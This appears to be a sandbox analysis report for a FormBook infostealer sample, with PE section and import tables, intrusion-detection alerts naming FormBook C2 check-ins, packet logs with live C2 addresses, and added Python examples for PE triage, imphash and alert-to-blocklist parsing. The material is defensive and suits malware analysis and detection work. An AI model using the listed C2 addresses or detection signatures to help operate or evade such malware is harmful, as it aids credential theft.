IMAGE_DIRECTORY_ENTRY_IMPORT | 0x4bb14 | 0x28 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x65000 | 0x31f8 | .pdata
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x6a000 | 0x9f0 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x47580 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x47440 | 0x140 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x3c000 | 0x2b8 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x3a648 | 0x3a800 | ae79005d0d0fe176d53e781e1de1ba8b | False | 0.477672609508547 | data | 6.276966423924579 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x3c000 | 0x10432 | 0x10600 | c72f5d85e22764ad342862f4abc84204 | False | 0.4201306059160305 | data | 4.882588498752784 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x4d000 | 0x17344 | 0x15c00 | a5e6c6566cb836c90c4e7d663abe1255 | False | 0.37567349137931033 | Matlab v4 mat-file (little endian) i, sparse, rows 57, columns 98, imaginary | 2.842031074961108 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata | 0x65000 | 0x31f8 | 0x3200 | 1e318cfae4f5a3e57b915ec4ed79f33d | False | 0.476953125 | data | 5.5240758223981326 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
_RDATA | 0x69000 | 0x1f4 | 0x200 | ada42deae2bad26d862984b105b86738 | False | 0.505859375 | data | 4.191034655991663 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x6a000 | 0x9f0 | 0xa00 | 5835deba7f19304c1a5e65eb7496ff47 | False | 0.511328125 | data | 5.426763089037067 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
The File Type column is libmagic's guess at each section's raw bytes; "Matlab v4 mat-file" for .data is a misidentification of ordinary initialized data, consistent with that section's low entropy (2.84). No section is both writable and executable, and the 6.28 entropy of .text is in the range of normally compiled code rather than of a packed or encrypted payload.
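The section and data-directory tables above are what a walk of the PE headers produces. The following is an added example, not code from the report or from Joe Sandbox: a standard-library Python parser that builds a small PE32+ image in memory (a constructed file, not the sample), reads the COFF and optional headers, maps each data directory to the section containing it, computes per-section MD5 and entropy like the table above, and flags what a triager looks for first (a section that is both writable and executable, an executable section with entropy above 7, and a virtual size far larger than the raw size, all typical of packers). The `pack0` section name, the flag thresholds and the sample layout are illustrative choices; run `parse_pe(open(path, "rb").read())` against a real file.

```python
"""Walk a PE section table and its data directories with the standard library only."""
import hashlib
import math
import struct
from collections import Counter

IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000020, 0x00000040
IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE = 0x20000000, 0x40000000, 0x80000000
# Data directory order fixed by the PE format (index 7 is ARCHITECTURE, shown as COPYRIGHT above).
DIRECTORY_NAMES = ["EXPORT", "IMPORT", "RESOURCE", "EXCEPTION", "SECURITY", "BASERELOC", "DEBUG",
                   "COPYRIGHT", "GLOBALPTR", "TLS", "LOAD_CONFIG", "BOUND_IMPORT", "IAT",
                   "DELAY_IMPORT", "COM_DESCRIPTOR", "RESERVED"]


def shannon_entropy(data: bytes) -> float:
    """Bits per byte, 0.0..8.0; packed or encrypted payloads sit close to 8."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def section_for_rva(sections, rva):
    """Name of the section whose address range covers rva, '' if none."""
    for s in sections:
        if s["virtual_address"] <= rva < s["virtual_address"] + max(s["virtual_size"], s["raw_size"]):
            return s["name"]
    return ""


def parse_pe(pe: bytes):
    """Return (is_pe32plus, sections, directories) for a raw PE image."""
    if pe[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    _machine, nsections, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", pe, coff)
    opt = coff + 20
    is_pe32plus = struct.unpack_from("<H", pe, opt)[0] == 0x20B      # 0x10B would be PE32
    sections = []
    for i in range(nsections):                                        # section headers follow the optional header
        (name, vsize, va, raw_size, raw_ptr, _, _, _, _,
         chars) = struct.unpack_from("<8sIIIIIIHHI", pe, opt + opt_size + 40 * i)
        raw = pe[raw_ptr:raw_ptr + raw_size]
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "virtual_address": va, "virtual_size": vsize, "raw_size": raw_size,
                         "md5": hashlib.md5(raw).hexdigest(), "entropy": shannon_entropy(raw),
                         "characteristics": chars})
    # The 16 data directories follow the fixed optional header: 112 bytes in PE32+, 96 in PE32.
    dir_base = opt + (112 if is_pe32plus else 96)
    directories = {}
    for i, label in enumerate(DIRECTORY_NAMES):
        rva, size = struct.unpack_from("<II", pe, dir_base + 8 * i)
        directories["IMAGE_DIRECTORY_ENTRY_" + label] = (rva, size, section_for_rva(sections, rva) if size else "")
    return is_pe32plus, sections, directories


def triage(sections):
    """Section-level red flags as (section name, reason) pairs."""
    findings = []
    for s in sections:
        c = s["characteristics"]
        if c & IMAGE_SCN_MEM_WRITE and c & IMAGE_SCN_MEM_EXECUTE:
            findings.append((s["name"], "writable and executable"))
        if c & IMAGE_SCN_MEM_EXECUTE and s["entropy"] > 7.0:
            findings.append((s["name"], "high-entropy executable section"))
        if s["virtual_size"] > 2 * s["raw_size"]:                     # room reserved for code unpacked at run time
            findings.append((s["name"], "virtual size far exceeds raw size"))
    return findings


def build_sample_pe() -> bytes:
    """Constructed three-section PE32+ image for this demo, not the report's sample."""
    def header(name, va, vsize, raw_ptr, data, chars):
        return struct.pack("<8sIIIIIIHHI", name, vsize, va, len(data), raw_ptr, 0, 0, 0, 0, chars)
    text = b"\x90" * 0x100 + bytes(range(256))                                 # 0x200 bytes, code-like entropy
    rdata = b"\0" * 0x200
    packed = b"".join(hashlib.sha256(bytes([i])).digest() for i in range(64))   # 0x800 bytes that look encrypted
    image = (b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)                        # DOS header, e_lfanew = 0x40
             + b"PE\0\0" + struct.pack("<HHIIIHH", 0x8664, 3, 0, 0, 0, 240, 0x22)  # COFF: x64, 3 sections, 240-byte opt hdr
             + struct.pack("<H", 0x20B) + b"\0" * 110)                           # PE32+ magic, rest of fixed part zeroed
    dirs = [(0, 0)] * 16
    dirs[1] = (0x2010, 0x28)                                                    # import directory placed inside .rdata
    image += b"".join(struct.pack("<II", *d) for d in dirs)
    image += header(b".text", 0x1000, 0x200, 0x200, text, IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ)
    image += header(b".rdata", 0x2000, 0x200, 0x400, rdata, IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ)
    image += header(b"pack0", 0x3000, 0x4000, 0x600, packed,
                    IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE)
    return image.ljust(0x200, b"\0") + text + rdata + packed


if __name__ == "__main__":
    plus, secs, dirs = parse_pe(build_sample_pe())
    print("PE32+" if plus else "PE32")
    for s in secs:
        print(f'{s["name"]:8} va={s["virtual_address"]:#07x} vsize={s["virtual_size"]:#07x} '
              f'raw={s["raw_size"]:#07x} entropy={s["entropy"]:.2f} md5={s["md5"]}')
    print({k: v for k, v in dirs.items() if v[1]})
    for name, reason in triage(secs):
        print(f"FLAG {name}: {reason}")
```

The "Is in Section" column of the directory table is exactly `section_for_rva`: a directory whose RVA falls outside every section (or into a section with no raw data) is itself worth a closer look, since loaders tolerate it but normal linkers do not produce it.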
DLL | Import
KERNEL32.dll | GetLastError, GetModuleHandleA, GetProcAddress, WideCharToMultiByte, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionEx, DeleteCriticalSection, EncodePointer, DecodePointer, MultiByteToWideChar, LCMapStringEx, GetStringTypeW, GetCPInfo, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, IsProcessorFeaturePresent, GetModuleHandleW, GetCurrentProcess, TerminateProcess, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, SetEndOfFile, RtlPcToFileHeader, RaiseException, RtlUnwindEx, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, ExitProcess, GetModuleHandleExW, GetModuleFileNameW, GetStdHandle, WriteFile, GetCommandLineA, GetCommandLineW, HeapAlloc, HeapFree, FlsAlloc, FlsGetValue, FlsSetValue, FlsFree, CompareStringW, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, GetFileType, CloseHandle, FlushFileBuffers, GetConsoleOutputCP, GetConsoleMode, ReadFile, GetFileSizeEx, SetFilePointerEx, ReadConsoleW, HeapReAlloc, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableW, GetProcessHeap, SetStdHandle, CreateFileW, HeapSize, WriteConsoleW, RtlUnwind
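The import hash reported for this sample (daf5c93667eaae2edfeefaa93a963f14) is the value analysts pivot on to find other builds of the same loader, because it depends on the import table rather than on bytes a packer rewrites. As an added example, not from the report, here is the recipe in standard-library Python: each import becomes lower-cased `dll.function` with the DLL extension stripped (ordinals become `ordN`), the entries are joined with commas in import-table order, and the MD5 of that string is the hash. The SAMPLE_IMPORTS list is constructed from the first KERNEL32.dll names above plus an invented ordinal import; it does not reproduce the page's value, since the report may not list every import in table order, and the function deliberately omits the ordinal-to-name tables that pefile applies for ws2_32 and oleaut32.

```python
"""Import hash (imphash) from a PE import list, standard library only."""
import hashlib

IMPHASH_EXTENSIONS = (".dll", ".ocx", ".sys")   # extensions pefile strips before hashing


def normalize_import(dll: str, func) -> str:
    """Canonical 'dll.func' form: lower case, extension stripped, ordinals as ordN."""
    name = dll.lower()
    for ext in IMPHASH_EXTENSIONS:
        if name.endswith(ext):
            name = name[: -len(ext)]
            break
    func_name = f"ord{func}" if isinstance(func, int) else func.lower()
    return f"{name}.{func_name}"


def imphash(imports) -> str:
    """MD5 over the comma-joined normalized imports, in import-table order."""
    joined = ",".join(normalize_import(dll, func) for dll, func in imports)
    return hashlib.md5(joined.encode("ascii")).hexdigest()


# Constructed input: the first KERNEL32.dll names from the import table above plus an
# invented ordinal import (COMCTL32 #17) to exercise the ordinal path.
SAMPLE_IMPORTS = [
    ("KERNEL32.dll", "GetLastError"),
    ("KERNEL32.dll", "GetModuleHandleA"),
    ("KERNEL32.dll", "GetProcAddress"),
    ("KERNEL32.dll", "WideCharToMultiByte"),
    ("COMCTL32.dll", 17),
]

if __name__ == "__main__":
    print(imphash(SAMPLE_IMPORTS))
```

Order matters and case does not: two binaries whose linkers emitted the same functions in a different order get different hashes, which is why imphash clusters builds of one toolchain and source tree rather than "anything importing these APIs".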
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
05/16/24-17:19:27.047625 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49722 | 80 | 192.168.2.9 | 57.151.38.169
05/16/24-17:21:43.322537 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49747 | 80 | 192.168.2.9 | 199.59.243.225
05/16/24-17:19:56.497938 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49730 | 80 | 192.168.2.9 | 217.160.0.111
05/16/24-17:20:28.696791 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49736 | 80 | 192.168.2.9 | 162.0.237.22
05/16/24-17:21:12.951995 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49742 | 80 | 192.168.2.9 | 103.168.172.37
05/16/24-17:19:19.363164 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49719 | 80 | 192.168.2.9 | 57.151.38.169
05/16/24-17:21:22.633918 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49744 | 80 | 192.168.2.9 | 104.37.39.71
05/16/24-17:18:46.331711 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49713 | 80 | 192.168.2.9 | 3.33.130.190
05/16/24-17:19:21.898890 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49720 | 80 | 192.168.2.9 | 57.151.38.169
05/16/24-17:20:03.048420 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49731 | 80 | 192.168.2.9 | 91.195.240.123
05/16/24-17:19:51.432033 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49728 | 80 | 192.168.2.9 | 217.160.0.111
05/16/24-17:19:06.306804 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49716 | 80 | 192.168.2.9 | 162.241.216.140
05/16/24-17:21:04.300154 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49739 | 80 | 192.168.2.9 | 103.168.172.37
05/16/24-17:20:10.669912 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49734 | 80 | 192.168.2.9 | 91.195.240.123
05/16/24-17:21:51.276734 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49750 | 80 | 192.168.2.9 | 199.59.243.225
05/16/24-17:20:26.161324 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49735 | 80 | 192.168.2.9 | 162.0.237.22
05/16/24-17:21:06.836740 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49740 | 80 | 192.168.2.9 | 103.168.172.37
05/16/24-17:19:34.590843 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49723 | 80 | 192.168.2.9 | 162.241.216.140
05/16/24-17:21:27.714376 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49746 | 80 | 192.168.2.9 | 104.37.39.71
05/16/24-17:20:33.776360 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49738 | 80 | 192.168.2.9 | 162.0.237.22
05/16/24-17:19:03.768347 | TCP | 2856318 | ETPRO TROJAN FormBook CnC Checkin (POST) M4 | 49714 | 80 | 192.168.2.9 | 162.241.216.140
05/16/24-17:19:42.203635 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49726 | 80 | 192.168.2.9 | 162.241.216.140
05/16/24-17:21:20.106505 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49743 | 80 | 192.168.2.9 | 104.37.39.71
05/16/24-17:19:03.768347 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49714 | 80 | 192.168.2.9 | 162.241.216.140
05/16/24-17:20:05.587966 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49732 | 80 | 192.168.2.9 | 91.195.240.123
05/16/24-17:21:45.851510 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49748 | 80 | 192.168.2.9 | 199.59.243.225
05/16/24-17:19:11.367879 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49718 | 80 | 192.168.2.9 | 162.241.216.140
05/16/24-17:19:37.117289 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49724 | 80 | 192.168.2.9 | 162.241.216.140
05/16/24-17:19:48.469305 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49727 | 80 | 192.168.2.9 | 217.160.0.111
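The alert table above shows one infected host checking in to nine different destinations over about three minutes, so a per-destination profile is more useful to a responder than the first alert that fires. Added example, not from the report: a subset of those rows rewritten in Snort's fast-alert format (constructed; the timestamps, SIDs, ports and addresses are the page's, the classification text is assumed), fed to a small standard-library Python script that recovers the fields, profiles check-ins per destination (count, GET versus POST, which SIDs, first and last seen) and emits the public destinations as a block list.

```python
"""Turn Snort fast-log alerts into per-C2 check-in profiles and a block list."""
import ipaddress
import re
from collections import defaultdict
from datetime import datetime

# Constructed input: a subset of the alert table above in Snort fast-alert format.
ALERTS = """\
05/16/24-17:18:46.331711  [**] [1:2855465:1] ETPRO TROJAN FormBook CnC Checkin (GET) M2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.2.9:49713 -> 3.33.130.190:80
05/16/24-17:19:03.768347  [**] [1:2856318:1] ETPRO TROJAN FormBook CnC Checkin (POST) M4 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.2.9:49714 -> 162.241.216.140:80
05/16/24-17:19:03.768347  [**] [1:2855464:1] ETPRO TROJAN FormBook CnC Checkin (POST) M3 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.2.9:49714 -> 162.241.216.140:80
05/16/24-17:19:11.367879  [**] [1:2855465:1] ETPRO TROJAN FormBook CnC Checkin (GET) M2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.2.9:49718 -> 162.241.216.140:80
05/16/24-17:19:19.363164  [**] [1:2855464:1] ETPRO TROJAN FormBook CnC Checkin (POST) M3 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.2.9:49719 -> 57.151.38.169:80
05/16/24-17:19:27.047625  [**] [1:2855465:1] ETPRO TROJAN FormBook CnC Checkin (GET) M2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.2.9:49722 -> 57.151.38.169:80
05/16/24-17:19:48.469305  [**] [1:2855464:1] ETPRO TROJAN FormBook CnC Checkin (POST) M3 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.2.9:49727 -> 217.160.0.111:80
05/16/24-17:19:56.497938  [**] [1:2855465:1] ETPRO TROJAN FormBook CnC Checkin (GET) M2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.2.9:49730 -> 217.160.0.111:80
"""

FAST_RE = re.compile(
    r"^(?P<ts>\d{2}/\d{2}/\d{2}-\d{2}:\d{2}:\d{2}\.\d{6})\s+\[\*\*\]\s+"
    r"\[(?P<gid>\d+):(?P<sid>\d+):(?P<rev>\d+)\]\s+(?P<msg>.*?)\s+\[\*\*\].*?"
    r"\{(?P<proto>\w+)\}\s+(?P<src>[\d.]+):(?P<sport>\d+)\s+->\s+(?P<dst>[\d.]+):(?P<dport>\d+)$"
)


def parse_alert(line: str) -> dict:
    """One fast-log line to a dict; raises on anything that is not an alert line."""
    m = FAST_RE.match(line.strip())
    if not m:
        raise ValueError(f"not a Snort fast-format alert: {line!r}")
    f = m.groupdict()
    method = re.search(r"\((GET|POST)\)", f["msg"])      # the FormBook rules name the HTTP method
    return {
        "ts": datetime.strptime(f["ts"], "%m/%d/%y-%H:%M:%S.%f"),
        "sid": int(f["sid"]), "msg": f["msg"], "proto": f["proto"],
        "src": f["src"], "sport": int(f["sport"]), "dst": f["dst"], "dport": int(f["dport"]),
        "method": method.group(1) if method else None,
    }


def summarize(alerts):
    """Per destination: check-in count, GET/POST split, SIDs, first and last seen."""
    profile = {}
    for a in sorted(alerts, key=lambda a: a["ts"]):
        p = profile.setdefault(a["dst"], {"count": 0, "get": 0, "post": 0, "sids": set(),
                                          "first": a["ts"], "last": a["ts"]})
        p["count"] += 1
        if a["method"] == "GET":
            p["get"] += 1
        elif a["method"] == "POST":
            p["post"] += 1
        p["sids"].add(a["sid"])
        p["last"] = a["ts"]
    return profile


def iocs(alerts):
    """Public destination addresses in numeric order, ready for a block list."""
    hosts = {a["dst"] for a in alerts if not ipaddress.ip_address(a["dst"]).is_private}
    return sorted(hosts, key=ipaddress.ip_address)


def victims(alerts):
    """Internal sources that triggered alerts, with alert counts."""
    counts = defaultdict(int)
    for a in alerts:
        if ipaddress.ip_address(a["src"]).is_private:
            counts[a["src"]] += 1
    return dict(counts)


if __name__ == "__main__":
    alerts = [parse_alert(line) for line in ALERTS.splitlines()]
    print("victims:", victims(alerts))
    for dst, p in summarize(alerts).items():
        window = (p["last"] - p["first"]).total_seconds()
        print(f"{dst:16} {p['count']} check-ins ({p['get']} GET / {p['post']} POST) "
              f"sids={sorted(p['sids'])} window={window:.1f}s")
    print("block:", ", ".join(iocs(alerts)))
```

Feeding the full table through `summarize` is how to see that every destination receives the same GET/POST check-in pattern from the same client; the block list from `iocs` then covers all of them rather than whichever one happened to answer first.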
Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 16, 2024 17:18:46.324276924 CEST | 49713 | 80 | 192.168.2.9 | 3.33.130.190
May 16, 2024 17:18:46.329226971 CEST | 80 | 49713 | 3.33.130.190 | 192.168.2.9
May 16, 2024 17:18:46.329325914 CEST | 49713 | 80 | 192.168.2.9 | 3.33.130.190
May 16, 2024 17:18:46.331711054 CEST | 49713 | 80 | 192.168.2.9 | 3.33.130.190
May 16, 2024 17:18:46.380167007 CEST | 80 | 49713 | 3.33.130.190 | 192.168.2.9
May 16, 2024 17:18:48.392440081 CEST | 80 | 49713 | 3.33.130.190 | 192.168.2.9
May 16, 2024 17:18:48.435635090 CEST | 49713 | 80 | 192.168.2.9 | 3.33.130.190
May 16, 2024 17:18:48.696089983 CEST | 80 | 49713 | 3.33.130.190 | 192.168.2.9
May 16, 2024 17:18:48.696387053 CEST | 49713 | 80 | 192.168.2.9 | 3.33.130.190
May 16, 2024 17:18:48.697690010 CEST | 49713 | 80 | 192.168.2.9 | 3.33.130.190
May 16, 2024 17:18:48.751924038 CEST | 80 | 49713 | 3.33.130.190 | 192.168.2.9
May 16, 2024 17:19:03.761560917 CEST | 49714 | 80 | 192.168.2.9 | 162.241.216.140
May 16, 2024 17:19:03.766444921 CEST | 80 | 49714 | 162.241.216.140 | 192.168.2.9
May 16, 2024 17:19:03.766522884 CEST | 49714 | 80 | 192.168.2.9 | 162.241.216.140
May 16, 2024 17:19:03.768347025 CEST | 49714 | 80 | 192.168.2.9 | 162.241.216.140
May 16, 2024 17:19:03.819943905 CEST | 80 | 49714 | 162.241.216.140 | 192.168.2.9
May 16, 2024 17:19:05.125972033 CEST | 80 | 49714 | 162.241.216.140 | 192.168.2.9
May 16, 2024 17:19:05.170070887 CEST | 49714 | 80 | 192.168.2.9 | 162.241.216.140
May 16, 2024 17:19:05.279503107 CEST | 49714 | 80 | 192.168.2.9 | 162.241.216.140
May 16, 2024 17:19:06.299604893 CEST | 49716 | 80 | 192.168.2.9 | 162.241.216.140
May 16, 2024 17:19:06.304570913 CEST | 80 | 49716 | 162.241.216.140 | 192.168.2.9
May 16, 2024 17:19:06.304650068 CEST | 49716 | 80 | 192.168.2.9 | 162.241.216.140
May 16, 2024 17:19:06.306803942 CEST | 49716 | 80 | 192.168.2.9 | 162.241.216.140
May 16, 2024 17:19:06.356061935 CEST | 80 | 49716 | 162.241.216.140 | 192.168.2.9
May 16, 2024 17:19:07.694478989 CEST | 80 | 49716 | 162.241.216.140 | 192.168.2.9
May 16, 2024 17:19:07.694504976 CEST | 80 | 49716 | 162.241.216.140 | 192.168.2.9
May 16, 2024 17:19:07.694731951 CEST | 49716 | 80 | 192.168.2.9 | 162.241.216.140
May 16, 2024 17:19:07.810813904 CEST | 49716 | 80 | 192.168.2.9 | 162.241.216.140
May 16, 2024 17:19:08.829400063 CEST | 49717 | 80 | 192.168.2.9 | 162.241.216.140
May 16, 2024 17:19:08.834475040 CEST | 80 | 49717 | 162.241.216.140 | 192.168.2.9
May 16, 2024 17:19:08.834553003 CEST | 49717 | 80 | 192.168.2.9 | 162.241.216.140
May 16, 2024 17:19:08.836431980 CEST | 49717 | 80 | 192.168.2.9 | 162.241.216.140
May 16, 2024 17:19:08.843250990 CEST | 80 | 49717 | 162.241.216.140 | 192.168.2.9
May 16, 2024 17:19:08.894784927 CEST | 80 | 49717 | 162.241.216.140 | 192.168.2.9
May 16, 2024 17:19:09.538666964 CEST | 80 | 49717 | 162.241.216.140 | 192.168.2.9
May 16, 2024 17:19:09.591913939 CEST | 49717 | 80 | 192.168.2.9 | 162.241.216.140
May 16, 2024 17:19:09.848310947 CEST | 80 | 49717 | 162.241.216.140 | 192.168.2.9
May 16, 2024 17:19:09.848371983 CEST | 49717 | 80 | 192.168.2.9 | 162.241.216.140
May 16, 2024 17:19:10.342015028 CEST | 49717 | 80 | 192.168.2.9 | 162.241.216.140
May 16, 2024 17:19:11.361006975 CEST | 49718 | 80 | 192.168.2.9 | 162.241.216.140
May 16, 2024 17:19:11.366080046 CEST | 80 | 49718 | 162.241.216.140 | 192.168.2.9
May 16, 2024 17:19:11.366169930 CEST | 49718 | 80 | 192.168.2.9 | 162.241.216.140
May 16, 2024 17:19:11.367878914 CEST | 49718 | 80 | 192.168.2.9 | 162.241.216.140
May 16, 2024 17:19:11.416141033 CEST | 80 | 49718 | 162.241.216.140 | 192.168.2.9
May 16, 2024 17:19:12.440829039 CEST | 80 | 49718 | 162.241.216.140 | 192.168.2.9
May 16, 2024 17:19:12.482573986 CEST | 49718 | 80 | 192.168.2.9 | 162.241.216.140
May 16, 2024 17:19:12.733263969 CEST | 80 | 49718 | 162.241.216.140 | 192.168.2.9
May 16, 2024 17:19:12.733428001 CEST | 49718 | 80 | 192.168.2.9 | 162.241.216.140
May 16, 2024 17:19:14.233988047 CEST | 49718 | 80 | 192.168.2.9 | 162.241.216.140
May 16, 2024 17:19:14.239041090 CEST | 80 | 49718 | 162.241.216.140 | 192.168.2.9
May 16, 2024 17:19:19.353404045 CEST | 49719 | 80 | 192.168.2.9 | 57.151.38.169
May 16, 2024 17:19:19.358443975 CEST | 80 | 49719 | 57.151.38.169 | 192.168.2.9
May 16, 2024 17:19:19.358586073 CEST | 49719 | 80 | 192.168.2.9 | 57.151.38.169
May 16, 2024 17:19:19.363163948 CEST | 49719 | 80 | 192.168.2.9 | 57.151.38.169
May 16, 2024 17:19:19.412175894 CEST | 80 | 49719 | 57.151.38.169 | 192.168.2.9
May 16, 2024 17:19:20.155518055 CEST | 80 | 49719 | 57.151.38.169 | 192.168.2.9
May 16, 2024 17:19:20.201375961 CEST | 49719 | 80 | 192.168.2.9 | 57.151.38.169
May 16, 2024 17:19:20.474569082 CEST | 80 | 49719 | 57.151.38.169 | 192.168.2.9
May 16, 2024 17:19:20.474647045 CEST | 49719 | 80 | 192.168.2.9 | 57.151.38.169
May 16, 2024 17:19:20.873369932 CEST | 49719 | 80 | 192.168.2.9 | 57.151.38.169
May 16, 2024 17:19:21.891849041 CEST | 49720 | 80 | 192.168.2.9 | 57.151.38.169
May 16, 2024 17:19:21.896855116 CEST | 80 | 49720 | 57.151.38.169 | 192.168.2.9
May 16, 2024 17:19:21.896995068 CEST | 49720 | 80 | 192.168.2.9 | 57.151.38.169
May 16, 2024 17:19:21.898890018 CEST | 49720 | 80 | 192.168.2.9 | 57.151.38.169
May 16, 2024 17:19:21.948046923 CEST | 80 | 49720 | 57.151.38.169 | 192.168.2.9
May 16, 2024 17:19:23.406748056 CEST | 49720 | 80 | 192.168.2.9 | 57.151.38.169
May 16, 2024 17:19:23.435662985 CEST | 80 | 49720 | 57.151.38.169 | 192.168.2.9
May 16, 2024 17:19:23.435767889 CEST | 49720 | 80 | 192.168.2.9 | 57.151.38.169
May 16, 2024 17:19:24.479079962 CEST | 49721 | 80 | 192.168.2.9 | 57.151.38.169
May 16, 2024 17:19:24.484056950 CEST | 80 | 49721 | 57.151.38.169 | 192.168.2.9
May 16, 2024 17:19:24.484157085 CEST | 49721 | 80 | 192.168.2.9 | 57.151.38.169
May 16, 2024 17:19:24.486053944 CEST | 49721 | 80 | 192.168.2.9 | 57.151.38.169
May 16, 2024 17:19:24.490938902 CEST | 80 | 49721 | 57.151.38.169 | 192.168.2.9
May 16, 2024 17:19:24.552165031 CEST | 80 | 49721 | 57.151.38.169 | 192.168.2.9
May 16, 2024 17:19:25.999231100 CEST | 49721 | 80 | 192.168.2.9 | 57.151.38.169
May 16, 2024 17:19:26.005398989 CEST | 80 | 49721 | 57.151.38.169 | 192.168.2.9
